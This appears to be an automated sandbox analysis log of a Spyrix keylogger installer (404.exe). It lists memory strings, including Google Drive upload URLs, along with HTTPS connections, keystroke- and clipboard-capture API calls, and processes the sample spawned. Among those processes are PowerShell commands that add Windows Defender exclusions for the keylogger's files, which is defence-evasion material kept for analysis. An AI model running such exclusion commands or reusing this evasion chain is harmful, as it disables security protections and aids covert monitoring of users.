            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/drive/v2/about
            Source: spkl.exeString found in binary or memory: https://www.googleapis.com/drive/v2/files
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/drive/v2/files/
            Source: spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/drive/v2/files/U
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/drive/v2/files?maxResults=1000&q=
            Source: spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/drive/v2/filesU
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/upload/drive/v2/files/
            Source: spkl.exeString found in binary or memory: https://www.googleapis.com/upload/drive/v2/files?uploadType=resumable
            Source: spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/upload/drive/v2/files?uploadType=resumableSV
            Source: spkl.exe, 00000033.00000002.3201106110.0000000000915000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2965463976.00000000044CC000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3244401024.000000000457B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.spyrix.com
            Source: spkl.exe, 00000033.00000002.3201106110.0000000000915000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2965463976.00000000044CC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.spyrix.com/purchase.php?prg=sfk
            Source: spkl.exe, 00000033.00000002.3244401024.000000000457B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.spyrix.com/purchase.php?prg=sfkI
            Source: spkl.exe, 00000033.00000002.3247512604.0000000004C18000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.spyrix.come
            Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55040 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55063 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55019 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55054 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55075
            Source: unknownNetwork traffic detected: HTTP traffic on port 55028 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55074
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55073
            Source: unknownNetwork traffic detected: HTTP traffic on port 55031 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55072
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55076
            Source: unknownNetwork traffic detected: HTTP traffic on port 55066 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55016 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55045 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55037 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55072 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55020 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55051 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55048 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55013 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55034 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55046 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55023 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55009
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55007
            Source: unknownNetwork traffic detected: HTTP traffic on port 55007 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55026 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55013
            Source: unknownNetwork traffic detected: HTTP traffic on port 55052 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55049 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 55018 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55043 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55068 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55016
            Source: unknownNetwork traffic detected: HTTP traffic on port 55060 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55015
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55014
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55019
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55018
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55020
            Source: unknownNetwork traffic detected: HTTP traffic on port 55032 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55024
            Source: unknownNetwork traffic detected: HTTP traffic on port 55057 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55023
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55022
            Source: unknownNetwork traffic detected: HTTP traffic on port 55074 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55021
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55067 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55015 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55038 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55044 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55028
            Source: unknownNetwork traffic detected: HTTP traffic on port 55009 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55026
            Source: unknownNetwork traffic detected: HTTP traffic on port 55021 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55031
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55030
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55035
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55034
            Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55033
            Source: unknownNetwork traffic detected: HTTP traffic on port 55058 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55032
            Source: unknownNetwork traffic detected: HTTP traffic on port 55073 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55035 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55050 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55041 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55062 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55039
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55038
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55037
            Source: unknownNetwork traffic detected: HTTP traffic on port 55024 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55036
            Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55030 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55042
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55041
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55040
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55046
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55045
            Source: unknownNetwork traffic detected: HTTP traffic on port 55076 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55044
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55043
            Source: unknownNetwork traffic detected: HTTP traffic on port 55042 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55049
            Source: unknownNetwork traffic detected: HTTP traffic on port 55059 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55061 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55048
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55047
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55053
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55052
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55051
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55050
            Source: unknownNetwork traffic detected: HTTP traffic on port 55033 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55057
            Source: unknownNetwork traffic detected: HTTP traffic on port 55075 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55056
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55054
            Source: unknownNetwork traffic detected: HTTP traffic on port 55056 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55014 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55039 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55047 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55064 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55022 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55059
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55058
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55064
            Source: unknownNetwork traffic detected: HTTP traffic on port 55053 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55063
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55062
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55061
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55068
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55067
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55066
            Source: unknownNetwork traffic detected: HTTP traffic on port 55036 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55060
            Source: unknownHTTPS traffic detected: 23.109.93.100:443 -> 192.168.2.7:49702 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.7:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.7:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 167.114.14.170:443 -> 192.168.2.7:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 167.114.14.168:443 -> 192.168.2.7:49713 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.7:49714 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.7:55007 version: TLS 1.2
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_033A6312 OpenClipboard,51_2_033A6312
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_033A6342 SetClipboardData,51_2_033A6342
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_033A6292 GetAsyncKeyState,51_2_033A6292
            Source: spkl.exe, 00000033.00000003.3002861269.0000000006CFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_7444ed91-3
            Source: C:\Users\user\Desktop\404.exeCode function: 0_2_09B994D8 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,0_2_09B994D8

            System Summary

            barindex
            Source: is-A63B5.tmp.13.drStatic PE information: section name:
            Source: is-A63B5.tmp.13.drStatic PE information: section name:
            Source: is-A63B5.tmp.13.drStatic PE information: section name:
            Source: is-A63B5.tmp.13.drStatic PE information: section name:
            Source: is-A63B5.tmp.13.drStatic PE information: section name:
            Source: is-A63B5.tmp.13.drStatic PE information: section name:
            Source: is-A63B5.tmp.13.drStatic PE information: section name:
            Source: is-A63B5.tmp.13.drStatic PE information: section name:
            Source: is-A63B5.tmp.13.drStatic PE information: section name:
            Source: is-A63B5.tmp.13.drStatic PE information: section name:
            Source: is-F1LPA.tmp.13.drStatic PE information: section name:
            Source: is-F1LPA.tmp.13.drStatic PE information: section name:
            Source: is-F1LPA.tmp.13.drStatic PE information: section name:
            Source: is-F1LPA.tmp.13.drStatic PE information: section name:
            Source: is-F1LPA.tmp.13.drStatic PE information: section name:
            Source: is-F1LPA.tmp.13.drStatic PE information: section name:
            Source: is-F1LPA.tmp.13.drStatic PE information: section name:
            Source: is-F1LPA.tmp.13.drStatic PE information: section name:
            Source: is-F1LPA.tmp.13.drStatic PE information: section name:
            Source: is-F1LPA.tmp.13.drStatic PE information: section name:
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess created: C:\Windows\SysWOW64\regedit.exe "regedit.exe" /e "C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.uid" "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1"
            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87'"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess '404.*'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c plist.cmd
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87'"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess '404.*'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c plist.cmd
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_033A6252 NtdllDefWindowProc_A,51_2_033A6252
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_033A5FFA: DeviceIoControl,51_2_033A5FFA
            Source: C:\Users\user\Desktop\404.exeCode function: 0_2_0242DC340_2_0242DC34
            Source: C:\Users\user\Desktop\404.exeCode function: 0_2_09B900400_2_09B90040
            Source: C:\Users\user\Desktop\404.exeCode function: 0_2_09B92DF00_2_09B92DF0
            Source: C:\Users\user\Desktop\404.exeCode function: 0_2_09B9AFA80_2_09B9AFA8
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_008696A951_2_008696A9
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_0086957A51_2_0086957A
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_033C665451_2_033C6654
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_033DE88C51_2_033DE88C
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_033D1D5051_2_033D1D50
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_033B110C51_2_033B110C
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_033B053851_2_033B0538
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_3_014907A065_3_014907A0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_3_014907A065_3_014907A0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_3_014907A065_3_014907A0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_3_014907A065_3_014907A0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_3_014907A065_3_014907A0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_3_014907A065_3_014907A0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_3_014907A065_3_014907A0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_3_014907A065_3_014907A0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_3_014907A065_3_014907A0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_3_014907A065_3_014907A0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_3_014907A065_3_014907A0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_3_014907A065_3_014907A0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_3_014907A065_3_014907A0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_3_014907A065_3_014907A0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_3_014907A065_3_014907A0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_3_014907A065_3_014907A0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_3_014907A065_3_014907A0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_3_014907A065_3_014907A0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_3_014907A065_3_014907A0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_3_014907A065_3_014907A0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_3_014907A065_3_014907A0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_3_014907A065_3_014907A0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_3_014907A065_3_014907A0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_3_014907A065_3_014907A0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_3_014907A065_3_014907A0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_2_0024B89065_2_0024B890
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_2_002420F065_2_002420F0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_2_0023A13265_2_0023A132
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_2_002A013065_2_002A0130
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_2_0025417065_2_00254170
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_2_002AA14065_2_002AA140
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_2_0023A13265_2_0023A132
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_2_0028A34065_2_0028A340
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_2_0025E59065_2_0025E590
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_2_0025F5D065_2_0025F5D0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_2_004B85B065_2_004B85B0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_2_0024062065_2_00240620
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_2_002536A065_2_002536A0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_2_002866B065_2_002866B0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_2_002676C065_2_002676C0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_2_0028A7B065_2_0028A7B0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_2_002659E065_2_002659E0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_2_00249A2065_2_00249A20
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_2_00262A9D65_2_00262A9D
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_2_002A8C2065_2_002A8C20
